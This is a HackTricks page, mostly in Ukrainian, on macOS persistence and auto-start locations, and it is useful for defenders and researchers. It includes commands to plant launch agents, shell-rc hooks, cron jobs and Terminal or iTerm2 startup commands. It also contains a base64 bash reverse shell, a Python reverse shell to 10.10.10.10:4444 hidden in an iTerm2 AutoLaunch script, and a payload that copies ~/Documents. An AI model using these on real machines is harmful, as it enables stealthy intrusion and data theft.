# macOS Auto Start {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %} Цей розділ значною мірою базується на серії блогів [**Beyond the good ol' LaunchAgents**](https://theevilbit.github.io/beyond/), мета полягає в тому, щоб додати **більше місць автозапуску** (якщо це можливо), вказати **які техніки все ще працюють** сьогодні з останньою версією macOS (13.4) і вказати **дозволи**, які потрібні. ## Sandbox Bypass {% hint style="success" %} Тут ви можете знайти місця запуску, корисні для **sandbox bypass**, які дозволяють вам просто виконати щось, **записавши це у файл** і **чекаючи** на дуже **поширену** **дію**, визначену **кількість часу** або **дію, яку ви зазвичай можете виконати** зсередини пісочниці без необхідності в кореневих дозволах. {% endhint %} ### Launchd * Корисно для обходу пісочниці: [✅](https://emojipedia.org/check-mark-button) * TCC Bypass: [🔴](https://emojipedia.org/large-red-circle) #### Locations * **`/Library/LaunchAgents`** * **Тригер**: Перезавантаження * Потрібен root * **`/Library/LaunchDaemons`** * **Тригер**: Перезавантаження * Потрібен root * **`/System/Library/LaunchAgents`** * **Тригер**: Перезавантаження * Потрібен root * **`/System/Library/LaunchDaemons`** * **Тригер**: Перезавантаження * Потрібен root * **`~/Library/LaunchAgents`** * **Тригер**: Повторний вхід * **`~/Library/LaunchDemons`** * **Тригер**: Повторний вхід {% hint style="success" %} Як цікава деталь, **`launchd`** має вбудований список властивостей у секції Mach-o `__Text.__config`, який містить інші відомі сервіси, які launchd повинен запустити. Більше того, ці сервіси можуть містити `RequireSuccess`, `RequireRun` і `RebootOnSuccess`, що означає, що вони повинні бути запущені і завершені успішно. Звичайно, його не можна змінити через підписування коду. {% endhint %} #### Description & Exploitation **`launchd`** є **першим** **процесом**, який виконується ядром OX S під час запуску, і останнім, що завершується під час вимкнення. Він завжди повинен мати **PID 1**. Цей процес буде **читати та виконувати** конфігурації, вказані в **ASEP** **plist** у: * `/Library/LaunchAgents`: Агенти для користувача, встановлені адміністратором * `/Library/LaunchDaemons`: Деймони системи, встановлені адміністратором * `/System/Library/LaunchAgents`: Агенти для користувача, надані Apple. * `/System/Library/LaunchDaemons`: Деймони системи, надані Apple. Коли користувач входить, plist, розташовані в `/Users/$USER/Library/LaunchAgents` і `/Users/$USER/Library/LaunchDemons`, запускаються з **дозволами увійшовшого користувача**. **Головна різниця між агентами та деймонами полягає в тому, що агенти завантажуються, коли користувач входить, а деймони завантажуються під час запуску системи** (оскільки є сервіси, такі як ssh, які потрібно виконати до того, як будь-який користувач отримує доступ до системи). Також агенти можуть використовувати GUI, тоді як деймонам потрібно працювати у фоновому режимі. ```xml Label com.apple.someidentifier ProgramArguments bash -c 'touch /tmp/launched' RunAtLoad StartInterval 800 KeepAlive SuccessfulExit ``` Є випадки, коли **агент потрібно виконати до входу користувача**, ці випадки називаються **PreLoginAgents**. Наприклад, це корисно для надання допоміжних технологій під час входу. Їх також можна знайти в `/Library/LaunchAgents` (див. [**тут**](https://github.com/HelmutJ/CocoaSampleCode/tree/master/PreLoginAgents) приклад). {% hint style="info" %} Нові конфігураційні файли Daemons або Agents будуть **завантажені після наступного перезавантаження або за допомогою** `launchctl load ` Також **можна завантажити .plist файли без цього розширення** за допомогою `launchctl -F ` (однак ці plist файли не будуть автоматично завантажені після перезавантаження).\ Також можна **вивантажити** за допомогою `launchctl unload ` (процес, на який він вказує, буде завершено), Щоб **переконатися**, що немає **нічого** (як-от переопределення), що **перешкоджає** **Агенту** або **Демону** **в** **роботі**, виконайте: `sudo launchctl load -w /System/Library/LaunchDaemos/com.apple.smdb.plist` {% endhint %} Перерахуйте всіх агентів і демонів, завантажених поточним користувачем: ```bash launchctl list ``` {% hint style="warning" %} Якщо plist належить користувачу, навіть якщо він знаходиться в системних папках демонів, **задача буде виконана як користувач** і не як root. Це може запобігти деяким атакам підвищення привілеїв. {% endhint %} #### Більше інформації про launchd **`launchd`** є **першим** процесом у режимі користувача, який запускається з **ядра**. Запуск процесу повинен бути **успішним** і він **не може завершитися або аварійно зупинитися**. Він навіть **захищений** від деяких **сигналів завершення**. Однією з перших речей, які зробить `launchd`, є **запуск** всіх **демонів**, таких як: * **Демони таймера**, які виконуються за розкладом: * atd (`com.apple.atrun.plist`): Має `StartInterval` 30 хвилин * crond (`com.apple.systemstats.daily.plist`): Має `StartCalendarInterval`, щоб почати о 00:15 * **Мережеві демони**, такі як: * `org.cups.cups-lpd`: Слухає на TCP (`SockType: stream`) з `SockServiceName: printer` * SockServiceName має бути або портом, або службою з `/etc/services` * `com.apple.xscertd.plist`: Слухає на TCP на порту 1640 * **Демони шляху**, які виконуються, коли змінюється вказаний шлях: * `com.apple.postfix.master`: Перевіряє шлях `/etc/postfix/aliases` * **Демони сповіщень IOKit**: * `com.apple.xartstorageremoted`: `"com.apple.iokit.matching" => { "com.apple.device-attach" => { "IOMatchLaunchStream" => 1 ...` * **Mach порт:** * `com.apple.xscertd-helper.plist`: Вказує в запису `MachServices` ім'я `com.apple.xscertd.helper` * **UserEventAgent:** * Це відрізняється від попереднього. Він змушує launchd запускати програми у відповідь на певні події. Однак у цьому випадку основний бінарний файл, що бере участь, не є `launchd`, а `/usr/libexec/UserEventAgent`. Він завантажує плагіни з обмеженої папки SIP /System/Library/UserEventPlugins/, де кожен плагін вказує свій ініціалізатор у ключі `XPCEventModuleInitializer` або, у випадку старіших плагінів, у словнику `CFPluginFactories` під ключем `FB86416D-6164-2070-726F-70735C216EC0` його `Info.plist`. ### shell startup files Writeup: [https://theevilbit.github.io/beyond/beyond\_0001/](https://theevilbit.github.io/beyond/beyond\_0001/)\ Writeup (xterm): [https://theevilbit.github.io/beyond/beyond\_0018/](https://theevilbit.github.io/beyond/beyond\_0018/) * Корисно для обходу пісочниці: [✅](https://emojipedia.org/check-mark-button) * Обхід TCC: [✅](https://emojipedia.org/check-mark-button) * Але вам потрібно знайти програму з обходом TCC, яка виконує оболонку, що завантажує ці файли #### Локації * **`~/.zshrc`, `~/.zlogin`, `~/.zshenv.zwc`**, **`~/.zshenv`, `~/.zprofile`** * **Тригер**: Відкрити термінал з zsh * **`/etc/zshenv`, `/etc/zprofile`, `/etc/zshrc`, `/etc/zlogin`** * **Тригер**: Відкрити термінал з zsh * Потрібен root * **`~/.zlogout`** * **Тригер**: Вийти з терміналу з zsh * **`/etc/zlogout`** * **Тригер**: Вийти з терміналу з zsh * Потрібен root * Потенційно більше в: **`man zsh`** * **`~/.bashrc`** * **Тригер**: Відкрити термінал з bash * `/etc/profile` (не спрацювало) * `~/.profile` (не спрацювало) * `~/.xinitrc`, `~/.xserverrc`, `/opt/X11/etc/X11/xinit/xinitrc.d/` * **Тригер**: Очікується, що спрацює з xterm, але він **не встановлений** і навіть після встановлення виникає ця помилка: xterm: `DISPLAY is not set` #### Опис та експлуатація При ініціалізації середовища оболонки, такого як `zsh` або `bash`, **виконуються певні файли запуску**. macOS наразі використовує `/bin/zsh` як оболонку за замовчуванням. Ця оболонка автоматично відкривається, коли запускається програма Terminal або коли пристрій доступний через SSH. Хоча `bash` і `sh` також присутні в macOS, їх потрібно явно викликати для використання. Сторінка man для zsh, яку ми можемо прочитати за допомогою **`man zsh`**, має довгий опис файлів запуску. ```bash # Example executino via ~/.zshrc echo "touch /tmp/hacktricks" >> ~/.zshrc ``` ### Перезапущені програми {% hint style="danger" %} Налаштування вказаного експлуатаційного коду та виходу з системи, а також повторного входу або навіть перезавантаження не спрацювало для виконання програми. (Програма не виконувалася, можливо, вона повинна бути запущена, коли виконуються ці дії) {% endhint %} **Writeup**: [https://theevilbit.github.io/beyond/beyond\_0021/](https://theevilbit.github.io/beyond/beyond\_0021/) * Корисно для обходу пісочниці: [✅](https://emojipedia.org/check-mark-button) * Обхід TCC: [🔴](https://emojipedia.org/large-red-circle) #### Місцезнаходження * **`~/Library/Preferences/ByHost/com.apple.loginwindow..plist`** * **Тригер**: Перезапуск перезапущених програм #### Опис та експлуатація Всі програми для перезапуску знаходяться всередині plist `~/Library/Preferences/ByHost/com.apple.loginwindow..plist` Отже, щоб перезапустити програми, які запускають вашу власну, вам просто потрібно **додати вашу програму до списку**. UUID можна знайти, перерахувавши цю директорію або за допомогою `ioreg -rd1 -c IOPlatformExpertDevice | awk -F'"' '/IOPlatformUUID/{print $4}'` Щоб перевірити програми, які будуть перезапущені, ви можете зробити: ```bash defaults -currentHost read com.apple.loginwindow TALAppsToRelaunchAtLogin #or plutil -p ~/Library/Preferences/ByHost/com.apple.loginwindow..plist ``` Щоб **додати додаток до цього списку**, ви можете використовувати: ```bash # Adding iTerm2 /usr/libexec/PlistBuddy -c "Add :TALAppsToRelaunchAtLogin: dict" \ -c "Set :TALAppsToRelaunchAtLogin:$:BackgroundState 2" \ -c "Set :TALAppsToRelaunchAtLogin:$:BundleID com.googlecode.iterm2" \ -c "Set :TALAppsToRelaunchAtLogin:$:Hide 0" \ -c "Set :TALAppsToRelaunchAtLogin:$:Path /Applications/iTerm.app" \ ~/Library/Preferences/ByHost/com.apple.loginwindow..plist ``` ### Terminal Preferences * Корисно для обходу пісочниці: [✅](https://emojipedia.org/check-mark-button) * Обхід TCC: [✅](https://emojipedia.org/check-mark-button) * Терминал використовує дозволи FDA користувача, який його використовує #### Location * **`~/Library/Preferences/com.apple.Terminal.plist`** * **Trigger**: Відкрити Terminal #### Description & Exploitation У **`~/Library/Preferences`** зберігаються налаштування користувача в програмах. Деякі з цих налаштувань можуть містити конфігурацію для **виконання інших програм/скриптів**. Наприклад, Terminal може виконати команду при запуску:
Ця конфігурація відображається у файлі **`~/Library/Preferences/com.apple.Terminal.plist`** ось так: ```bash [...] "Window Settings" => { "Basic" => { "CommandString" => "touch /tmp/terminal_pwn" "Font" => {length = 267, bytes = 0x62706c69 73743030 d4010203 04050607 ... 00000000 000000cf } "FontAntialias" => 1 "FontWidthSpacing" => 1.004032258064516 "name" => "Basic" "ProfileCurrentVersion" => 2.07 "RunCommandAsShell" => 0 "type" => "Window Settings" } [...] ``` Отже, якщо plist налаштувань терміналу в системі може бути перезаписаний, то функціональність **`open`** може бути використана для **відкриття терміналу, і ця команда буде виконана**. Ви можете додати це з cli за допомогою: {% code overflow="wrap" %} ```bash # Add /usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" 'touch /tmp/terminal-start-command'" $HOME/Library/Preferences/com.apple.Terminal.plist /usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"RunCommandAsShell\" 0" $HOME/Library/Preferences/com.apple.Terminal.plist # Remove /usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" ''" $HOME/Library/Preferences/com.apple.Terminal.plist ``` {% endcode %} ### Terminal Scripts / Інші розширення файлів * Корисно для обходу пісочниці: [✅](https://emojipedia.org/check-mark-button) * Обхід TCC: [✅](https://emojipedia.org/check-mark-button) * Використання терміналу для отримання дозволів FDA користувача #### Місцезнаходження * **Де завгодно** * **Тригер**: Відкрити Термінал #### Опис та експлуатація Якщо ви створите [**`.terminal`** скрипт](https://stackoverflow.com/questions/32086004/how-to-use-the-default-terminal-settings-when-opening-a-terminal-file-osx) і відкриєте його, **додаток Термінал** буде автоматично викликаний для виконання команд, вказаних там. Якщо додаток Термінал має якісь спеціальні привілеї (такі як TCC), ваша команда буде виконана з цими спеціальними привілеями. Спробуйте це з: ```bash # Prepare the payload cat > /tmp/test.terminal << EOF CommandString mkdir /tmp/Documents; cp -r ~/Documents /tmp/Documents; ProfileCurrentVersion 2.0600000000000001 RunCommandAsShell name exploit type Window Settings EOF # Trigger it open /tmp/test.terminal # Use something like the following for a reverse shell: echo -n "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYxOw==" | base64 -d | bash; ``` Ви також можете використовувати розширення **`.command`**, **`.tool`**, з вмістом звичайних оболонкових скриптів, і вони також будуть відкриті в Terminal. {% hint style="danger" %} Якщо термінал має **Повний доступ до диска**, він зможе виконати цю дію (зверніть увагу, що виконана команда буде видна у вікні терміналу). {% endhint %} ### Аудіоплагіни Написання: [https://theevilbit.github.io/beyond/beyond\_0013/](https://theevilbit.github.io/beyond/beyond\_0013/)\ Написання: [https://posts.specterops.io/audio-unit-plug-ins-896d3434a882](https://posts.specterops.io/audio-unit-plug-ins-896d3434a882) * Корисно для обходу пісочниці: [✅](https://emojipedia.org/check-mark-button) * Обхід TCC: [🟠](https://emojipedia.org/large-orange-circle) * Ви можете отримати додатковий доступ до TCC #### Місцезнаходження * **`/Library/Audio/Plug-Ins/HAL`** * Потрібен root * **Тригер**: Перезапустіть coreaudiod або комп'ютер * **`/Library/Audio/Plug-ins/Components`** * Потрібен root * **Тригер**: Перезапустіть coreaudiod або комп'ютер * **`~/Library/Audio/Plug-ins/Components`** * **Тригер**: Перезапустіть coreaudiod або комп'ютер * **`/System/Library/Components`** * Потрібен root * **Тригер**: Перезапустіть coreaudiod або комп'ютер #### Опис Згідно з попередніми написаннями, можливо **скомпілювати деякі аудіоплагіни** та завантажити їх. ### Плагіни QuickLook Написання: [https://theevilbit.github.io/beyond/beyond\_0028/](https://theevilbit.github.io/beyond/beyond\_0028/) * Корисно для обходу пісочниці: [✅](https://emojipedia.org/check-mark-button) * Обхід TCC: [🟠](https://emojipedia.org/large-orange-circle) * Ви можете отримати додатковий доступ до TCC #### Місцезнаходження * `/System/Library/QuickLook` * `/Library/QuickLook` * `~/Library/QuickLook` * `/Applications/AppNameHere/Contents/Library/QuickLook/` * `~/Applications/AppNameHere/Contents/Library/QuickLook/` #### Опис та експлуатація Плагіни QuickLook можуть бути виконані, коли ви **тригерите попередній перегляд файлу** (натисніть пробіл, вибравши файл у Finder) і **плагін, що підтримує цей тип файлу**, встановлений. Можливо скомпілювати свій власний плагін QuickLook, помістити його в одне з попередніх місць для завантаження, а потім перейти до підтримуваного файлу і натиснути пробіл, щоб тригерити його. ### ~~Хуки входу/виходу~~ {% hint style="danger" %} Це не спрацювало для мене, ні з LoginHook користувача, ні з LogoutHook root {% endhint %} **Написання**: [https://theevilbit.github.io/beyond/beyond\_0022/](https://theevilbit.github.io/beyond/beyond\_0022/) * Корисно для обходу пісочниці: [✅](https://emojipedia.org/check-mark-button) * Обхід TCC: [🔴](https://emojipedia.org/large-red-circle) #### Місцезнаходження * Вам потрібно мати можливість виконати щось на зразок `defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh` * `Розташовано` в `~/Library/Preferences/com.apple.loginwindow.plist` Вони застаріли, але можуть бути використані для виконання команд, коли користувач входить. ```bash cat > $HOME/hook.sh << EOF #!/bin/bash echo 'My is: \`id\`' > /tmp/login_id.txt EOF chmod +x $HOME/hook.sh defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh defaults write com.apple.loginwindow LogoutHook /Users/$USER/hook.sh ``` Ця налаштування зберігається в `/Users/$USER/Library/Preferences/com.apple.loginwindow.plist` ```bash defaults read /Users/$USER/Library/Preferences/com.apple.loginwindow.plist { LoginHook = "/Users/username/hook.sh"; LogoutHook = "/Users/username/hook.sh"; MiniBuddyLaunch = 0; TALLogoutReason = "Shut Down"; TALLogoutSavesState = 0; oneTimeSSMigrationComplete = 1; } ``` Щоб видалити це: ```bash defaults delete com.apple.loginwindow LoginHook defaults delete com.apple.loginwindow LogoutHook ``` Користувач root зберігається в **`/private/var/root/Library/Preferences/com.apple.loginwindow.plist`** ## Умовний обхід пісочниці {% hint style="success" %} Тут ви можете знайти місця запуску, корисні для **обходу пісочниці**, які дозволяють вам просто виконати щось, **записуючи це у файл** і **очікуючи не надто поширені умови**, такі як специфічні **встановлені програми, "незвичайні" дії користувача** або середовища. {% endhint %} ### Cron **Запис**: [https://theevilbit.github.io/beyond/beyond\_0004/](https://theevilbit.github.io/beyond/beyond\_0004/) * Корисно для обходу пісочниці: [✅](https://emojipedia.org/check-mark-button) * Однак, вам потрібно мати можливість виконати бінарний файл `crontab` * Або бути root * Обхід TCC: [🔴](https://emojipedia.org/large-red-circle) #### Місцезнаходження * **`/usr/lib/cron/tabs/`, `/private/var/at/tabs`, `/private/var/at/jobs`, `/etc/periodic/`** * Потрібен root для прямого доступу на запис. Root не потрібен, якщо ви можете виконати `crontab ` * **Тригер**: Залежить від cron завдання #### Опис та експлуатація Перелічте cron завдання **поточного користувача** за допомогою: ```bash crontab -l ``` Ви також можете побачити всі cron завдання користувачів у **`/usr/lib/cron/tabs/`** та **`/var/at/tabs/`** (потрібен root). У MacOS кілька папок, які виконують скрипти з **певною частотою**, можна знайти в: ```bash # The one with the cron jobs is /usr/lib/cron/tabs/ ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /etc/periodic/ ``` Там ви можете знайти звичайні **cron** **завдання**, **at** **завдання** (не дуже використовуються) та **періодичні** **завдання** (в основному використовуються для очищення тимчасових файлів). Щоденні періодичні завдання можна виконати, наприклад, за допомогою: `periodic daily`. Щоб додати **користувацьке cron-завдання програмно**, можна використовувати: ```bash echo '* * * * * /bin/bash -c "touch /tmp/cron3"' > /tmp/cron crontab /tmp/cron ``` ### iTerm2 Writeup: [https://theevilbit.github.io/beyond/beyond\_0002/](https://theevilbit.github.io/beyond/beyond\_0002/) * Корисно для обходу пісочниці: [✅](https://emojipedia.org/check-mark-button) * Обхід TCC: [✅](https://emojipedia.org/check-mark-button) * iTerm2 раніше мав надані дозволи TCC #### Locations * **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`** * **Trigger**: Відкрити iTerm * **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`** * **Trigger**: Відкрити iTerm * **`~/Library/Preferences/com.googlecode.iterm2.plist`** * **Trigger**: Відкрити iTerm #### Description & Exploitation Скрипти, збережені в **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`**, будуть виконані. Наприклад: ```bash cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh" << EOF #!/bin/bash touch /tmp/iterm2-autolaunch EOF chmod +x "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh" ``` or: ```bash cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.py" << EOF #!/usr/bin/env python3 import iterm2,socket,subprocess,os async def main(connection): s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['zsh','-i']); async with iterm2.CustomControlSequenceMonitor( connection, "shared-secret", r'^create-window$') as mon: while True: match = await mon.async_get() await iterm2.Window.async_create(connection) iterm2.run_forever(main) EOF ``` Скрипт **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`** також буде виконано: ```bash do shell script "touch /tmp/iterm2-autolaunchscpt" ``` Налаштування iTerm2, розташоване в **`~/Library/Preferences/com.googlecode.iterm2.plist`**, може **вказувати команду для виконання** при відкритті терміналу iTerm2. Це налаштування можна налаштувати в параметрах iTerm2:
І команда відображається в налаштуваннях: ```bash plutil -p com.googlecode.iterm2.plist { [...] "New Bookmarks" => [ 0 => { [...] "Initial Text" => "touch /tmp/iterm-start-command" ``` Ви можете встановити команду для виконання за допомогою: {% code overflow="wrap" %} ```bash # Add /usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" 'touch /tmp/iterm-start-command'" $HOME/Library/Preferences/com.googlecode.iterm2.plist # Call iTerm open /Applications/iTerm.app/Contents/MacOS/iTerm2 # Remove /usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" ''" $HOME/Library/Preferences/com.googlecode.iterm2.plist ``` {% endcode %} {% hint style="warning" %} Висока ймовірність, що є **інші способи зловживання налаштуваннями iTerm2** для виконання довільних команд. {% endhint %} ### xbar Writeup: [https://theevilbit.github.io/beyond/beyond\_0007/](https://theevilbit.github.io/beyond/beyond\_0007/) * Корисно для обходу пісочниці: [✅](https://emojipedia.org/check-mark-button) * Але xbar повинен бути встановлений * Обхід TCC: [✅](https://emojipedia.org/check-mark-button) * Він запитує дозволи на доступ до елементів керування #### Location * **`~/Library/Application\ Support/xbar/plugins/`** * **Trigger**: Як тільки xbar буде виконано #### Description Якщо популярна програма [**xbar**](https://github.com/matryer/xbar) встановлена, можна написати shell-скрипт у **`~/Library/Application\ Support/xbar/plugins/`**, який буде виконано при запуску xbar: ```bash cat > "$HOME/Library/Application Support/xbar/plugins/a.sh" << EOF #!/bin/bash touch /tmp/xbar EOF chmod +x "$HOME/Library/Application Support/xbar/plugins/a.sh" ``` ### Hammerspoon **Writeup**: [https://theevilbit.github.io/beyond/beyond\_0008/](https://theevilbit.github.io/beyond/beyond\_0008/) * Корисно для обходу пісочниці: [✅](https://emojipedia.org/check-mark-button) * Але Hammerspoon повинен бути встановлений * Обхід TCC: [✅](https://emojipedia.org/check-mark-button) * Він запитує дозволи на доступ до елементів керування #### Location * **`~/.hammerspoon/init.lua`** * **Trigger**: Як тільки hammerspoon буде виконано #### Description [**Hammerspoon**](https://github.com/Hammerspoon/hammerspoon) слугує автоматизаційною платформою для **macOS**, використовуючи **LUA** для своїх операцій. Важливо, що він підтримує інтеграцію повного коду AppleScript та виконання shell-скриптів, значно розширюючи свої можливості сценаріїв. Додаток шукає один файл, `~/.hammerspoon/init.lua`, і при запуску скрипт буде виконано. ```bash mkdir -p "$HOME/.hammerspoon" cat > "$HOME/.hammerspoon/init.lua" << EOF hs.execute("/Applications/iTerm.app/Contents/MacOS/iTerm2") EOF ``` ### BetterTouchTool * Корисно для обходу пісочниці: [✅](https://emojipedia.org/check-mark-button) * Але BetterTouchTool повинен бути встановлений * Обхід TCC: [✅](https://emojipedia.org/check-mark-button) * Він запитує дозволи на Автоматизацію-Шорткоти та Доступність #### Location * `~/Library/Application Support/BetterTouchTool/*` Цей інструмент дозволяє вказувати програми або скрипти для виконання, коли натискаються певні шорткоти. Зловмисник може налаштувати свій власний **шорткат і дію для виконання в базі даних**, щоб виконати довільний код (шорткат може бути просто натисканням клавіші). ### Alfred * Корисно для обходу пісочниці: [✅](https://emojipedia.org/check-mark-button) * Але Alfred повинен бути встановлений * Обхід TCC: [✅](https://emojipedia.org/check-mark-button) * Він запитує дозволи на Автоматизацію, Доступність і навіть Доступ до всього диска #### Location * `???` Це дозволяє створювати робочі процеси, які можуть виконувати код, коли виконуються певні умови. Потенційно зловмисник може створити файл робочого процесу і змусити Alfred завантажити його (необхідно оплатити преміум-версію для використання робочих процесів). ### SSHRC Writeup: [https://theevilbit.github.io/beyond/beyond\_0006/](https://theevilbit.github.io/beyond/beyond\_0006/) * Корисно для обходу пісочниці: [✅](https://emojipedia.org/check-mark-button) * Але ssh потрібно увімкнути та використовувати * Обхід TCC: [✅](https://emojipedia.org/check-mark-button) * SSH використовує FDA доступ #### Location * **`~/.ssh/rc`** * **Тригер**: Вхід через ssh * **`/etc/ssh/sshrc`** * Потрібен root * **Тригер**: Вхід через ssh {% hint style="danger" %} Щоб увімкнути ssh, потрібен Доступ до всього диска: ```bash sudo systemsetup -setremotelogin on ``` {% endhint %} #### Опис та експлуатація За замовчуванням, якщо в `/etc/ssh/sshd_config` не вказано `PermitUserRC no`, коли користувач **входить через SSH**, скрипти **`/etc/ssh/sshrc`** та **`~/.ssh/rc`** будуть виконані. ### **Елементи входу** Запис: [https://theevilbit.github.io/beyond/beyond\_0003/](https://theevilbit.github.io/beyond/beyond\_0003/) * Корисно для обходу пісочниці: [✅](https://emojipedia.org/check-mark-button) * Але потрібно виконати `osascript` з аргументами * Обхід TCC: [🔴](https://emojipedia.org/large-red-circle) #### Локації * **`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`** * **Тригер:** Вхід * Payload експлуатації зберігається, викликаючи **`osascript`** * **`/var/db/com.apple.xpc.launchd/loginitems.501.plist`** * **Тригер:** Вхід * Потрібен root #### Опис У Системних налаштуваннях -> Користувачі та групи -> **Елементи входу** ви можете знайти **елементи, які виконуються, коли користувач входить**.\ Можна їх перерахувати, додавати та видаляти з командного рядка: ```bash #List all items: osascript -e 'tell application "System Events" to get the name of every login item' #Add an item: osascript -e 'tell application "System Events" to make login item at end with properties {path:"/path/to/itemname", hidden:false}' #Remove an item: osascript -e 'tell application "System Events" to delete login item "itemname"' ``` Ці елементи зберігаються у файлі **`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`** **Елементи входу** також можуть бути вказані за допомогою API [SMLoginItemSetEnabled](https://developer.apple.com/documentation/servicemanagement/1501557-smloginitemsetenabled?language=objc), який зберігає конфігурацію у **`/var/db/com.apple.xpc.launchd/loginitems.501.plist`** ### ZIP як елемент входу (Перегляньте попередній розділ про елементи входу, це розширення) Якщо ви зберігаєте файл **ZIP** як **елемент входу**, **`Archive Utility`** відкриє його, і якщо zip, наприклад, зберігався у **`~/Library`** і містив папку **`LaunchAgents/file.plist`** з бекдором, ця папка буде створена (вона не створюється за замовчуванням) і plist буде додано, тому наступного разу, коли користувач знову увійде, **бекдор, вказаний у plist, буде виконано**. Інший варіант - створити файли **`.bash_profile`** та **`.zshenv** всередині домашньої директорії користувача, тому якщо папка LaunchAgents вже існує, ця техніка все ще буде працювати. ### At Написання: [https://theevilbit.github.io/beyond/beyond\_0014/](https://theevilbit.github.io/beyond/beyond\_0014/) * Корисно для обходу пісочниці: [✅](https://emojipedia.org/check-mark-button) * Але вам потрібно **виконати** **`at`** і він повинен бути **увімкнений** * Обхід TCC: [🔴](https://emojipedia.org/large-red-circle) #### Місцезнаходження * Потрібно **виконати** **`at`** і він повинен бути **увімкнений** #### **Опис** Завдання `at` призначені для **планування одноразових завдань** для виконання в певний час. На відміну від cron-завдань, завдання `at` автоматично видаляються після виконання. Важливо зазначити, що ці завдання зберігаються між перезавантаженнями системи, що робить їх потенційними проблемами безпеки за певних умов. За **замовчуванням** вони **вимкнені**, але користувач **root** може **увімкнути** **їх** за допомогою: ```bash sudo launchctl load -F /System/Library/LaunchDaemons/com.apple.atrun.plist ``` Це створить файл за 1 годину: ```bash echo "echo 11 > /tmp/at.txt" | at now+1 ``` Перевірте чергу завдань за допомогою `atq:` ```shell-session sh-3.2# atq 26 Tue Apr 27 00:46:00 2021 22 Wed Apr 28 00:29:00 2021 ``` Вище ми можемо побачити два заплановані завдання. Ми можемо надрукувати деталі завдання, використовуючи `at -c JOBNUMBER` ```shell-session sh-3.2# at -c 26 #!/bin/sh # atrun uid=0 gid=0 # mail csaby 0 umask 22 SHELL=/bin/sh; export SHELL TERM=xterm-256color; export TERM USER=root; export USER SUDO_USER=csaby; export SUDO_USER SUDO_UID=501; export SUDO_UID SSH_AUTH_SOCK=/private/tmp/com.apple.launchd.co51iLHIjf/Listeners; export SSH_AUTH_SOCK __CF_USER_TEXT_ENCODING=0x0:0:0; export __CF_USER_TEXT_ENCODING MAIL=/var/mail/root; export MAIL PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin; export PATH PWD=/Users/csaby; export PWD SHLVL=1; export SHLVL SUDO_COMMAND=/usr/bin/su; export SUDO_COMMAND HOME=/var/root; export HOME LOGNAME=root; export LOGNAME LC_CTYPE=UTF-8; export LC_CTYPE SUDO_GID=20; export SUDO_GID _=/usr/bin/at; export _ cd /Users/csaby || { echo 'Execution directory inaccessible' >&2 exit 1 } unset OLDPWD echo 11 > /tmp/at.txt ``` {% hint style="warning" %} Якщо завдання AT не ввімкнені, створені завдання не будуть виконані. {% endhint %} Файли **завдань** можна знайти за адресою `/private/var/at/jobs/` ``` sh-3.2# ls -l /private/var/at/jobs/ total 32 -rw-r--r-- 1 root wheel 6 Apr 27 00:46 .SEQ -rw------- 1 root wheel 0 Apr 26 23:17 .lockfile -r-------- 1 root wheel 803 Apr 27 00:46 a00019019bdcd2 -rwx------ 1 root wheel 803 Apr 27 00:46 a0001a019bdcd2 ``` The filename contains the queue, the job number, and the time it’s scheduled to run. For example let’s take a loot at `a0001a019bdcd2`. * `a` - це черга * `0001a` - номер завдання в шістнадцятковій системі, `0x1a = 26` * `019bdcd2` - час у шістнадцятковій системі. Він представляє хвилини, що пройшли з епохи. `0x019bdcd2` це `26991826` у десятковій системі. Якщо помножити його на 60, отримаємо `1619509560`, що є `GMT: 2021. April 27., Tuesday 7:46:00`. If we print the job file, we find that it contains the same information we got using `at -c`. ### Folder Actions Writeup: [https://theevilbit.github.io/beyond/beyond\_0024/](https://theevilbit.github.io/beyond/beyond\_0024/)\ Writeup: [https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d](https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d) * Корисно для обходу пісочниці: [✅](https://emojipedia.org/check-mark-button) * Але вам потрібно мати можливість викликати `osascript` з аргументами, щоб зв’язатися з **`System Events`**, щоб налаштувати Дії папок * TCC обход: [🟠](https://emojipedia.org/large-orange-circle) * Має деякі базові дозволи TCC, такі як Робочий стіл, Документи та Завантаження #### Location * **`/Library/Scripts/Folder Action Scripts`** * Потрібен root * **Тригер**: Доступ до вказаної папки * **`~/Library/Scripts/Folder Action Scripts`** * **Тригер**: Доступ до вказаної папки #### Description & Exploitation Дії папок - це скрипти, які автоматично запускаються при змінах у папці, таких як додавання, 